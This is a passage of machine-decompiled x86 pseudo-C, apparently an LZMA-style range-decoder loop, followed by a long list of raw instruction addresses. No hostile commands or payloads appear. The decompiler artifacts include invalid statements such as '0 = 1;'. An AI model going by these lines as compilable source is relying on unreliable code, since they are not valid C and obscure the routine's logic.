							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							goto L55;
						case 0x1b:
							L75:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1b;
								goto L170;
							}
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							__eflags = __eax -  *(__ebp - 0x74);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
								__eflags = __eax;
							}
							__edx =  *(__ebp - 8);
							__cl =  *(__eax + __edx);
							__eax =  *(__ebp - 0x14);
							 *(__ebp - 0x5c) = __cl;
							 *(__eax + __edx) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t274 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t274;
							__eax =  *(__ebp - 0x68);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							_t283 = __ebp - 0x64;
							 *_t283 =  *(__ebp - 0x64) - 1;
							__eflags =  *_t283;
							 *( *(__ebp - 0x68)) = __cl;
							goto L79;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = __edx;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                                                                                              0x00000000
                                                                                              0x00406d5f
                                                                                              0x00406d5f
                                                                                              0x00406d64
                                                                                              0x00406ddb
                                                                                              0x00406de2
                                                                                              0x00406dec
                                                                                              0x004073cb
                                                                                              0x004073cb
                                                                                              0x004073ce
                                                                                              0x004073ce
                                                                                              0x004073d4
                                                                                              0x004073da
                                                                                              0x004073e0
                                                                                              0x004073fa
                                                                                              0x004073fd
                                                                                              0x00407403
                                                                                              0x0040740e
                                                                                              0x00407410
                                                                                              0x004073e2
                                                                                              0x004073e2
                                                                                              0x004073f1
                                                                                              0x004073f5
                                                                                              0x004073f5
                                                                                              0x0040741a
                                                                                              0x00407441
                                                                                              0x00407441
                                                                                              0x00407447
                                                                                              0x00407447
                                                                                              0x00000000
                                                                                              0x0040741c
                                                                                              0x0040741c
                                                                                              0x00407420
                                                                                              0x004075cf
                                                                                              0x00000000
                                                                                              0x004075cf
                                                                                              0x0040742c
                                                                                              0x00407433
                                                                                              0x0040743b
                                                                                              0x0040743e
                                                                                              0x00000000
                                                                                              0x0040743e
                                                                                              0x00406d66
                                                                                              0x00406d66
                                                                                              0x00406d6a
                                                                                              0x00406d72
                                                                                              0x00406d75
                                                                                              0x00406d77
                                                                                              0x00406d7a
                                                                                              0x00406d7c
                                                                                              0x00406d81
                                                                                              0x00406d84
                                                                                              0x00406d8b
                                                                                              0x00406d92
                                                                                              0x00406d95
                                                                                              0x00406da0
                                                                                              0x00406da8
                                                                                              0x00406da8
                                                                                              0x00406da2
                                                                                              0x00406da2
                                                                                              0x00406da2
                                                                                              0x00406d97
                                                                                              0x00406d97
                                                                                              0x00406d97
                                                                                              0x00406daf
                                                                                              0x00406dcd
                                                                                              0x00406dcf
                                                                                              0x00406fa2
                                                                                              0x00406fa2
                                                                                              0x00406fa5
                                                                                              0x00406fa8
                                                                                              0x00406fab
                                                                                              0x00406fae
                                                                                              0x00406fb1
                                                                                              0x00406fb4
                                                                                              0x00406fb7
                                                                                              0x00406fba
                                                                                              0x00406fc0
                                                                                              0x00406fd8
                                                                                              0x00406fdb
                                                                                              0x00406fde
                                                                                              0x00406fe1
                                                                                              0x00406fe4
                                                                                              0x00406fea
                                                                                              0x00406fc2
                                                                                              0x00406fc2
                                                                                              0x00406fca
                                                                                              0x00406fcf
                                                                                              0x00406fd1
                                                                                              0x00406fd3
                                                                                              0x00406fd3
                                                                                              0x00406ff4
                                                                                              0x00406ff7
                                                                                              0x00406f9a
                                                                                              0x00406fa0
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406ff9
                                                                                              0x00406f75
                                                                                              0x00406f79
                                                                                              0x00407581
                                                                                              0x00000000
                                                                                              0x00407581
                                                                                              0x00406f7f
                                                                                              0x00406f82
                                                                                              0x00406f85
                                                                                              0x00406f89
                                                                                              0x00406f8c
                                                                                              0x00406f92
                                                                                              0x00406f94
                                                                                              0x00406f94
                                                                                              0x00406f97
                                                                                              0x00000000
                                                                                              0x00406f97
                                                                                              0x00406db1
                                                                                              0x00406db1
                                                                                              0x00406db4
                                                                                              0x00406dba
                                                                                              0x00406dbc
                                                                                              0x00406dbc
                                                                                              0x00406dbf
                                                                                              0x00406dc2
                                                                                              0x00406dc4
                                                                                              0x00406dc5
                                                                                              0x00406dc8
                                                                                              0x00406e35
                                                                                              0x00406e35
                                                                                              0x00406e39
                                                                                              0x00406e3c
                                                                                              0x00406e3f
                                                                                              0x00406e42
                                                                                              0x00406e45
                                                                                              0x00406e46
                                                                                              0x00406e49
                                                                                              0x00406e4b
                                                                                              0x00406e51
                                                                                              0x00406e54
                                                                                              0x00406e57
                                                                                              0x00406e5a
                                                                                              0x00406e5d
                                                                                              0x00406e63
                                                                                              0x00406e7f
                                                                                              0x00406e82
                                                                                              0x00406e85
                                                                                              0x00406e88
                                                                                              0x00406e8f
                                                                                              0x00406e95
                                                                                              0x00406e99
                                                                                              0x00406e65
                                                                                              0x00406e65
                                                                                              0x00406e69
                                                                                              0x00406e71
                                                                                              0x00406e76
                                                                                              0x00406e78
                                                                                              0x00406e7a
                                                                                              0x00406e7a
                                                                                              0x00406ea3
                                                                                              0x00406ea6
                                                                                              0x00406e1d
                                                                                              0x00406e1d
                                                                                              0x00406e23
                                                                                              0x00406ed6
                                                                                              0x00406edc
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406ede
                                                                                              0x00406ee1
                                                                                              0x00406ee4
                                                                                              0x00406ee7
                                                                                              0x00406eea
                                                                                              0x00406eed
                                                                                              0x00406ef0
                                                                                              0x00406ef3
                                                                                              0x00406ef6
                                                                                              0x00406efc
                                                                                              0x00406f14
                                                                                              0x00406f17
                                                                                              0x00406f1a
                                                                                              0x00406f1d
                                                                                              0x00406f20
                                                                                              0x00406f26
                                                                                              0x00406efe
                                                                                              0x00406efe
                                                                                              0x00406f06
                                                                                              0x00406f0b
                                                                                              0x00406f0d
                                                                                              0x00406f0f
                                                                                              0x00406f0f
                                                                                              0x00406f30
                                                                                              0x00406f33
                                                                                              0x00406eb1
                                                                                              0x00406eb5
                                                                                              0x00407575
                                                                                              0x00000000
                                                                                              0x00407575
                                                                                              0x00406ebb
                                                                                              0x00406ebe
                                                                                              0x00406ec1
                                                                                              0x00406ec5
                                                                                              0x00406ec8
                                                                                              0x00406ece
                                                                                              0x00406ed0
                                                                                              0x00406ed0
                                                                                              0x00406ed3
                                                                                              0x00406ed3
                                                                                              0x00406f33
                                                                                              0x00406f3a
                                                                                              0x00406f3a
                                                                                              0x00406f3a
                                                                                              0x00406f3e
                                                                                              0x00406f3e
                                                                                              0x00406f41
                                                                                              0x00406f44
                                                                                              0x00406f48
                                                                                              0x0040758d
                                                                                              0x00000000
                                                                                              0x0040758d
                                                                                              0x00406f4e
                                                                                              0x00406f51
                                                                                              0x00406f54
                                                                                              0x00406f57
                                                                                              0x00406f5a
                                                                                              0x00406f5d
                                                                                              0x00406f60
                                                                                              0x00406f62
                                                                                              0x00406f65
                                                                                              0x00406f68
                                                                                              0x00406f6b
                                                                                              0x00406f6d
                                                                                              0x00406f6d
                                                                                              0x00406f6d
                                                                                              0x0040710a
                                                                                              0x0040710a
                                                                                              0x0040710d
                                                                                              0x0040710d
                                                                                              0x00000000
                                                                                              0x0040710d
                                                                                              0x00406e2f
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406eac
                                                                                              0x00406df8
                                                                                              0x00406dfc
                                                                                              0x00407569
                                                                                              0x004075e5
                                                                                              0x004075eb
                                                                                              0x004075ed
                                                                                              0x004075f4
                                                                                              0x004075f6
                                                                                              0x004075fd
                                                                                              0x00407601
                                                                                              0x00407601
                                                                                              0x00406e02
                                                                                              0x00406e05
                                                                                              0x00406e08
                                                                                              0x00406e0c
                                                                                              0x00406e0f
                                                                                              0x00406e15
                                                                                              0x00406e17
                                                                                              0x00406e17
                                                                                              0x00406e1a
                                                                                              0x00000000
                                                                                              0x00406e1a
                                                                                              0x00406ea6
                                                                                              0x00406daf
                                                                                              0x00406be3
                                                                                              0x00406be3
                                                                                              0x00406bec
                                                                                              0x004075fa
                                                                                              0x004075fa
                                                                                              0x00000000
                                                                                              0x004075fa
                                                                                              0x00406bf2
                                                                                              0x00000000
                                                                                              0x00406bfd
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406c06
                                                                                              0x00406c09
                                                                                              0x00406c0c
                                                                                              0x00406c10
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406c16
                                                                                              0x00406c19
                                                                                              0x00406c1b
                                                                                              0x00406c1c
                                                                                              0x00406c1f
                                                                                              0x00406c21
                                                                                              0x00406c22
                                                                                              0x00406c24
                                                                                              0x00406c27
                                                                                              0x00406c2c
                                                                                              0x00406c31
                                                                                              0x00406c3a
                                                                                              0x00406c4d
                                                                                              0x00406c50
                                                                                              0x00406c5c
                                                                                              0x00406c84
                                                                                              0x00406c86
                                                                                              0x00406c94
                                                                                              0x00406c94
                                                                                              0x00406c98
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406c88
                                                                                              0x00406c88
                                                                                              0x00406c8b
                                                                                              0x00406c8c
                                                                                              0x00406c8c
                                                                                              0x00000000
                                                                                              0x00406c88
                                                                                              0x00406c62
                                                                                              0x00406c67
                                                                                              0x00406c67
                                                                                              0x00406c70
                                                                                              0x00406c78
                                                                                              0x00406c7b
                                                                                              0x00000000
                                                                                              0x00406c81
                                                                                              0x00406c81
                                                                                              0x00000000
                                                                                              0x00406c81
                                                                                              0x00000000
                                                                                              0x00406c9e
                                                                                              0x00406c9e
                                                                                              0x00406ca2
                                                                                              0x0040754e
                                                                                              0x00000000
                                                                                              0x0040754e
                                                                                              0x00406cab
                                                                                              0x00406cbb
                                                                                              0x00406cbe
                                                                                              0x00406cc1
                                                                                              0x00406cc1
                                                                                              0x00406cc1
                                                                                              0x00406cc4
                                                                                              0x00406cc8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406cca
                                                                                              0x00406cd0
                                                                                              0x00406cfa
                                                                                              0x00406d00
                                                                                              0x00406d07
                                                                                              0x00000000
                                                                                              0x00406d07
                                                                                              0x00406cd6
                                                                                              0x00406cd9
                                                                                              0x00406cde
                                                                                              0x00406cde
                                                                                              0x00406ce9
                                                                                              0x00406cf1
                                                                                              0x00406cf4
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406d39
                                                                                              0x00406d3f
                                                                                              0x00406d42
                                                                                              0x00406d4f
                                                                                              0x00406d57
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406d0e
                                                                                              0x00406d0e
                                                                                              0x00406d12
                                                                                              0x0040755d
                                                                                              0x00000000
                                                                                              0x0040755d
                                                                                              0x00406d1e
                                                                                              0x00406d29
                                                                                              0x00406d29
                                                                                              0x00406d29
                                                                                              0x00406d2c
                                                                                              0x00406d2f
                                                                                              0x00406d32
                                                                                              0x00406d37
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406ffe
                                                                                              0x00407002
                                                                                              0x00407020
                                                                                              0x00407023
                                                                                              0x0040702a
                                                                                              0x0040702d
                                                                                              0x00407030
                                                                                              0x00407033
                                                                                              0x00407036
                                                                                              0x00407039
                                                                                              0x0040703b
                                                                                              0x00407042
                                                                                              0x00407043
                                                                                              0x00407045
                                                                                              0x00407048
                                                                                              0x0040704b
                                                                                              0x0040704e
                                                                                              0x0040704e
                                                                                              0x00407053
                                                                                              0x00000000
                                                                                              0x00407053
                                                                                              0x00407004
                                                                                              0x00407007
                                                                                              0x0040700a
                                                                                              0x00407014
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407068
                                                                                              0x0040706c
                                                                                              0x0040708f
                                                                                              0x00407092
                                                                                              0x00407095
                                                                                              0x0040709f
                                                                                              0x0040706e
                                                                                              0x0040706e
                                                                                              0x00407071
                                                                                              0x00407074
                                                                                              0x00407077
                                                                                              0x00407084
                                                                                              0x00407087
                                                                                              0x00407087
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004070ab
                                                                                              0x004070af
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004070b5
                                                                                              0x004070b9
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004070bf
                                                                                              0x004070c1
                                                                                              0x004070c5
                                                                                              0x004070c5
                                                                                              0x004070c8
                                                                                              0x004070cc
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040711c
                                                                                              0x00407120
                                                                                              0x00407127
                                                                                              0x0040712a
                                                                                              0x0040712d
                                                                                              0x00407137
                                                                                              0x00000000
                                                                                              0x00407137
                                                                                              0x00407122
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407143
                                                                                              0x00407147
                                                                                              0x0040714e
                                                                                              0x00407151
                                                                                              0x00407154
                                                                                              0x00407149
                                                                                              0x00407149
                                                                                              0x00407149
                                                                                              0x00407157
                                                                                              0x0040715a
                                                                                              0x0040715d
                                                                                              0x0040715d
                                                                                              0x00407160
                                                                                              0x00407163
                                                                                              0x00407166
                                                                                              0x00407166
                                                                                              0x00407169
                                                                                              0x00407170
                                                                                              0x00407175
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407203
                                                                                              0x00407203
                                                                                              0x00407207
                                                                                              0x004075a5
                                                                                              0x00000000
                                                                                              0x004075a5
                                                                                              0x0040720d
                                                                                              0x00407210
                                                                                              0x00407213
                                                                                              0x00407217
                                                                                              0x0040721a
                                                                                              0x00407220
                                                                                              0x00407222
                                                                                              0x00407222
                                                                                              0x00407222
                                                                                              0x00407225
                                                                                              0x00407228
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407286
                                                                                              0x00407286
                                                                                              0x0040728a
                                                                                              0x004075b1
                                                                                              0x00000000
                                                                                              0x004075b1
                                                                                              0x00407290
                                                                                              0x00407293
                                                                                              0x00407296
                                                                                              0x0040729a
                                                                                              0x0040729d
                                                                                              0x004072a3
                                                                                              0x004072a5
                                                                                              0x004072a5
                                                                                              0x004072a5
                                                                                              0x004072a8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407056
                                                                                              0x00407056
                                                                                              0x00407059
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407395
                                                                                              0x00407399
                                                                                              0x004073bb
                                                                                              0x004073be
                                                                                              0x004073c8
                                                                                              0x00000000
                                                                                              0x004073c8
                                                                                              0x0040739b
                                                                                              0x0040739e
                                                                                              0x004073a2
                                                                                              0x004073a5
                                                                                              0x004073a5
                                                                                              0x004073a8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407452
                                                                                              0x00407456
                                                                                              0x00407474
                                                                                              0x00407474
                                                                                              0x00407474
                                                                                              0x0040747b
                                                                                              0x00407482
                                                                                              0x00407489
                                                                                              0x00407489
                                                                                              0x00000000
                                                                                              0x00407489
                                                                                              0x00407458
                                                                                              0x0040745b
                                                                                              0x0040745e
                                                                                              0x00407461
                                                                                              0x00407468
                                                                                              0x004073ac
                                                                                              0x004073ac
                                                                                              0x004073af
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407543
                                                                                              0x00407546
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040717d
                                                                                              0x0040717f
                                                                                              0x00407186
                                                                                              0x00407187
                                                                                              0x00407189
                                                                                              0x0040718c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407194
                                                                                              0x00407197
                                                                                              0x0040719a
                                                                                              0x0040719c
                                                                                              0x0040719e
                                                                                              0x0040719e
                                                                                              0x0040719f
                                                                                              0x004071a2
                                                                                              0x004071a9
                                                                                              0x004071ac
                                                                                              0x004071ba
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407490
                                                                                              0x00407490
                                                                                              0x00407493
                                                                                              0x0040749a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040749f
                                                                                              0x0040749f
                                                                                              0x004074a3
                                                                                              0x004075db
                                                                                              0x00000000
                                                                                              0x004075db
                                                                                              0x004074a9
                                                                                              0x004074ac
                                                                                              0x004074af
                                                                                              0x004074b3
                                                                                              0x004074b6
                                                                                              0x004074bc
                                                                                              0x004074be
                                                                                              0x004074be
                                                                                              0x004074be
                                                                                              0x004074c1
                                                                                              0x004074c4
                                                                                              0x004074c4
                                                                                              0x004074c4
                                                                                              0x004074c4
                                                                                              0x004074c7
                                                                                              0x004074c7
                                                                                              0x004074cb
                                                                                              0x0040752b
                                                                                              0x0040752e
                                                                                              0x00407533
                                                                                              0x00407534
                                                                                              0x00407536
                                                                                              0x00407538
                                                                                              0x0040753b
                                                                                              0x00000000
                                                                                              0x0040753b
                                                                                              0x004074cd
                                                                                              0x004074d3
                                                                                              0x004074d6
                                                                                              0x004074d9
                                                                                              0x004074dc
                                                                                              0x004074df
                                                                                              0x004074e2
                                                                                              0x004074e5
                                                                                              0x004074e8
                                                                                              0x004074eb
                                                                                              0x004074ee
                                                                                              0x00407507
                                                                                              0x0040750a
                                                                                              0x0040750d
                                                                                              0x00407510
                                                                                              0x00407514
                                                                                              0x00407516
                                                                                              0x00407516
                                                                                              0x00407517
                                                                                              0x0040751a
                                                                                              0x004074f0
                                                                                              0x004074f0
                                                                                              0x004074f8
                                                                                              0x004074fd
                                                                                              0x004074ff
                                                                                              0x00407502
                                                                                              0x00407502
                                                                                              0x0040751d
                                                                                              0x00407524
                                                                                              0x00000000
                                                                                              0x00407526
                                                                                              0x00000000
                                                                                              0x00407526
                                                                                              0x00000000
                                                                                              0x004071c2
                                                                                              0x004071c5
                                                                                              0x004071fb
                                                                                              0x0040732b
                                                                                              0x0040732b
                                                                                              0x0040732b
                                                                                              0x0040732b
                                                                                              0x0040732e
                                                                                              0x0040732e
                                                                                              0x00407331
                                                                                              0x00407333
                                                                                              0x004075bd
                                                                                              0x00000000
                                                                                              0x004075bd
                                                                                              0x00407339
                                                                                              0x0040733c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407342
                                                                                              0x00407346
                                                                                              0x00407349
                                                                                              0x00407349
                                                                                              0x00407349
                                                                                              0x00000000
                                                                                              0x00407349
                                                                                              0x004071c7
                                                                                              0x004071c9
                                                                                              0x004071cb
                                                                                              0x004071cd
                                                                                              0x004071d0
                                                                                              0x004071d1
                                                                                              0x004071d3
                                                                                              0x004071d5
                                                                                              0x004071d8
                                                                                              0x004071db
                                                                                              0x004071f1
                                                                                              0x004071f6
                                                                                              0x0040722e
                                                                                              0x0040722e
                                                                                              0x00407232
                                                                                              0x0040725e
                                                                                              0x00407260
                                                                                              0x00407267
                                                                                              0x0040726a
                                                                                              0x0040726d
                                                                                              0x0040726d
                                                                                              0x00407272
                                                                                              0x00407272
                                                                                              0x00407274
                                                                                              0x00407277
                                                                                              0x0040727e
                                                                                              0x00407281
                                                                                              0x004072ae
                                                                                              0x004072ae
                                                                                              0x004072b1
                                                                                              0x004072b4
                                                                                              0x00407328
                                                                                              0x00407328
                                                                                              0x00407328
                                                                                              0x00000000
                                                                                              0x00407328
                                                                                              0x004072b6
                                                                                              0x004072bc
                                                                                              0x004072bf
                                                                                              0x004072c2
                                                                                              0x004072c5
                                                                                              0x004072c8
                                                                                              0x004072cb
                                                                                              0x004072ce
                                                                                              0x004072d1
                                                                                              0x004072d4
                                                                                              0x004072d7
                                                                                              0x004072f0
                                                                                              0x004072f2
                                                                                              0x004072f5
                                                                                              0x004072f6
                                                                                              0x004072f9
                                                                                              0x004072fb
